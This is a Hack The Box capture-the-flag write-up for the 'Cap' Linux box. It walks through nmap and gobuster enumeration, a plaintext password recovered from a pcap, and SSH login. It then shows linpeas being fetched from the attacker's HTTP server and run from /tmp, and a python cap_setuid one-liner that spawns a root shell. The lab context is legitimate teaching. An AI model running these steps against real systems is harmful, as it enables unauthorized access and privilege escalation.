Previous Page

nihilist - 28 / 04 / 2022

Cap Writeup

Introduction :



Cap is an Easy linux box released back in June 2021.

Part 1 : Initial Enumeration



As always we begin our Enumeration using Nmap to enumerate opened ports.
We will be using the flags -sC for default scripts and -sV to enumerate versions.


[ 10.66.66.2/32 ] [ /dev/pts/4 ] [~/HTB]
→ sudo vim /etc/hosts
[sudo] password for nothing:

[ 10.66.66.2/32 ] [ /dev/pts/4 ] [~/HTB]
→ cat /etc/hosts | tail -n1                                                                                                                                  
10.129.111.61 cap.htb

[ 10.66.66.2/32 ] [ /dev/pts/4 ] [~/HTB]
→ nmap -sCV cap.htb
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-28 18:26 CEST
Nmap scan report for cap.htb (10.129.111.61)
Host is up (0.041s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
|   256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_  256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open  http    gunicorn
|_http-server-header: gunicorn
|_http-title: Security Dashboard
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.0 404 NOT FOUND
|     Server: gunicorn
|     Date: Thu, 28 Apr 2022 16:27:05 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 232
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
|     <title>404 Not Found
|     <h1>Not Found
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   GetRequest:
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Thu, 28 Apr 2022 16:26:59 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 19386

[...]

Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 130.33 seconds

Part 2 : Getting User Access



Our nmap scan picked up port 80 so let's investigate it:

So as we can see, the mentionned ip (10.10.14.57) in the pcap file is my IP, and the file is titled 1.pcap. So let's dirbust the website to find other pcap files using gobuster:


[ 10.10.14.57/23 ] [ /dev/pts/31 ] [~/HTB]
→ gobuster dir -u http://cap.htb/data/ -t 50 -w /usr/share/seclists/Discovery/Web-Content/common.txt -b 302,403,404
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://cap.htb/data/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   302,403,404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/04/28 18:45:14 Starting gobuster in directory enumeration mode
===============================================================
/0                    (Status: 200) [Size: 17147]
/01                   (Status: 200) [Size: 17144]
/1                    (Status: 200) [Size: 17144]
/00                   (Status: 200) [Size: 17147]

===============================================================
2022/04/28 18:45:19 Finished
===============================================================

Gobuster found the /0 directory so let's go see what is in it:

going to http://cap.htb/0/ we find the 0.pcap which contains packet information regarding the nathan user's password Buck3tH4TF0RM3!. So let's try to login via SSH with his credentials:


[ 10.10.14.57/23 ] [ /dev/pts/31 ] [~/HTB]
→ ssh nathan@cap.htb
The authenticity of host 'cap.htb (10.129.111.61)' can't be established.
ED25519 key fingerprint is SHA256:UDhIJpylePItP3qjtVVU+GnSyAZSr+mZKHzRoKcmLUI.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'cap.htb' (ED25519) to the list of known hosts.
nathan@cap.htb's password:
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Apr 28 16:52:29 UTC 2022

  System load:           0.0
  Usage of /:            36.7% of 8.73GB
  Memory usage:          21%
  Swap usage:            0%
  Processes:             226
  Users logged in:       0
  IPv4 address for eth0: 10.129.111.61
  IPv6 address for eth0: dead:beef::250:56ff:fe96:4e24

  => There are 2 zombie processes.

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

   https://ubuntu.com/blog/microk8s-memory-optimisation

63 updates can be applied immediately.
42 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Thu May 27 11:21:27 2021 from 10.10.14.7
nathan@cap:~$ cat user.txt
54XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

And we got the user flag!

Part 3 : Getting Root Access



Now in order to get Root access we need to enumerate the machine, to do that we use linpeas.sh:


[term1]
[ 10.10.14.57/23 ] [ /dev/pts/34 ] [~/HTB/Cap]
→ wget https://github.com/carlospolop/PEASS-ng/releases/download/20220424/linpeas.sh
--2022-04-28 19:02:02--  https://github.com/carlospolop/PEASS-ng/releases/download/20220424/linpeas.sh
Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt'
Resolving github.com (github.com)... 52.69.186.44
Connecting to github.com (github.com)|52.69.186.44|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/165548191/081066de-a078-45b2-bfb8-06253be16e3a?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20220428%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20220428T170203Z&X-Amz-Expires=300&X-Amz-Signature=1f55ea92c90e5d3e1cdc14915367707f214da89d55934a919e20dbde9ba79ac6&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=165548191&response-content-disposition=attachment%3B%20filename%3Dlinpeas.sh&response-content-type=application%2Foctet-stream [following]
--2022-04-28 19:02:03--  https://objects.githubusercontent.com/github-production-release-asset-2e65be/165548191/081066de-a078-45b2-bfb8-06253be16e3a?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20220428%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20220428T170203Z&X-Amz-Expires=300&X-Amz-Signature=1f55ea92c90e5d3e1cdc14915367707f214da89d55934a919e20dbde9ba79ac6&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=165548191&response-content-disposition=attachment%3B%20filename%3Dlinpeas.sh&response-content-type=application%2Foctet-stream
Resolving objects.githubusercontent.com (objects.githubusercontent.com)... 185.199.108.133, 185.199.111.133, 185.199.110.133, ...
Connecting to objects.githubusercontent.com (objects.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 776167 (758K) [application/octet-stream]
Saving to: ‘linpeas.sh’

linpeas.sh                                             100%[===========================================================================================================================>] 757.98K  3.67MB/s    in 0.2s

2022-04-28 19:02:04 (3.67 MB/s) - ‘linpeas.sh’ saved [776167/776167]


[ 10.10.14.57/23 ] [ /dev/pts/34 ] [~/HTB/Cap]
→ python3 -m http.server 9090
Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
10.129.111.61 - - [28/Apr/2022 19:02:24] "GET /linpeas.sh HTTP/1.1" 200 -

[term2]
nathan@cap:~$ which wget curl
/usr/bin/wget
/usr/bin/curl
nathan@cap:~$ wget http://10.10.14.57:9090/linpeas.sh -O /tmp/linpeas.sh
--2022-04-28 17:02:24--  http://10.10.14.57:9090/linpeas.sh
Connecting to 10.10.14.57:9090... connected.
HTTP request sent, awaiting response... 200 OK
Length: 776167 (758K) [application/x-sh]
Saving to: ‘/tmp/linpeas.sh’

/tmp/linpeas.sh                                        100%[===========================================================================================================================>] 757.98K  1.87MB/s    in 0.4s

2022-04-28 17:02:24 (1.87 MB/s) - ‘/tmp/linpeas.sh’ saved [776167/776167]

nathan@cap:~$ chmod +x /tmp/linpeas.sh
nathan@cap:~$ /tmp/linpeas.sh

Now looking at the output of linpeas.sh we see that the cap_setuid capability has been enabled on the python3.8 binary. Which means that the user can run this binary as the root user. So we simply use python's gtfobin:


nathan@cap:~$ /usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/sh")'
# id
uid=0(root) gid=1001(nathan) groups=1001(nathan)
# cat /root/root.txt
bfXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

And that's it! We managed to escalate our privileges to the root user and get the root flag.

Conclusion



Here we can see the progress graph :